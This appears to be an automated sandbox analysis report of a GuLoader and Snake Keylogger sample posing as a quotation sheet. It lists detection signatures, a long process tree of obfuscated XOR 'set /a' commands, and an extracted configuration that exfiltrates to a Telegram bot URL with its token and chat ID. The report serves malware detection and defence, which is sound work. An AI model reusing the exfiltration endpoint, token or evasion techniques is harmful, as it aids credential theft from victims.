Windows Analysis Report
z1QuotationSheetVSAA6656776.exe

Overview

General Information

Sample name: z1QuotationSheetVSAA6656776.exe
Analysis ID: 1480054
MD5: cfb41760f84e1e70bade0ca7394d424b
SHA1: 139d1068c52255526ec38fe7ce0c48c365492712
SHA256: a2be0d024f1ed07193631fd4bcf91b224685a2624a3396dedbed5d071c29889f

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Obfuscated command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • z1QuotationSheetVSAA6656776.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe" MD5: CFB41760F84E1E70BADE0CA7394D424B)
    • cmd.exe (PID: 6292 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6448 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6292 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2996 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3112 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6292 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2588 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3584 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7832 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8276 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8340 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8396 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8452 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8512 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8568 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8624 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8680 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8736 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8792 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8848 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8904 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8960 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9016 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9072 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9128 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9204 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8316 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8372 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8436 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8460 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8520 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8572 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8728 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8784 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8828 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8880 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8936 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8992 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9060 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9112 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9172 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8260 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8448 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8504 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8540 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8620 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6812 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8568 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8708 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8780 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8824 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8888 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8936 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8992 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9060 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9112 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9172 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8260 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8408 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8472 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8512 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8652 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"}
Source | Rule | Description | Author
00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5544 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: z1QuotationSheetVSAA6656776.exe | Avira: detected
Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"}
Source: z1QuotationSheetVSAA6656776.exe | ReversingLabs: Detection: 50%

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784BBC8 CryptUnprotectData | 131_2_3784BBC8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784C302 CryptUnprotectData | 131_2_3784C302
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_3784C250 CryptUnprotectData | 131_2_3784C250
Source: z1QuotationSheetVSAA6656776.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2
Source: z1QuotationSheetVSAA6656776.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_00406167 FindFirstFileA,FindClose | 0_2_00406167
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_00405705
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_00402688 FindFirstFileA | 0_2_00402688
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00406167 FindFirstFileA,FindClose | 131_2_00406167
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 131_2_00405705
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00402688 FindFirstFileA | 131_2_00402688
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 0016F1FEh | 131_2_0016F01B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 0016FB88h | 131_2_0016F01B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 131_2_0016E530
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 131_2_0016EB63
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 131_2_0016ED44
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37841A38h | 131_2_37841620
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37841471h | 131_2_378411C0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784F9A7h | 131_2_3784F700
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784FDFFh | 131_2_3784FB58
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784F54Fh | 131_2_3784F2A8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then mov esp, ebp | 131_2_3784DEB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784F0F7h | 131_2_3784EE50
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784E847h | 131_2_3784E5A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784EC9Fh | 131_2_3784E9F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37840BB1h | 131_2_37840900
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 3784E3EFh | 131_2_3784E148
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37841A38h | 131_2_37841966
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37841011h | 131_2_37840D60
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37840751h | 131_2_378404A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 378402F1h | 131_2_37840040
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B92E57h | 131_2_37B92BB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9B4A3h | 131_2_37B9B168
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B99E58h | 131_2_37B99BB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B91447h | 131_2_37B911A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9189Fh | 131_2_37B915F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B98877h | 131_2_37B985D0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B999D7h | 131_2_37B99730
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 131_2_37B95F18
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9AFB7h | 131_2_37B9AD10
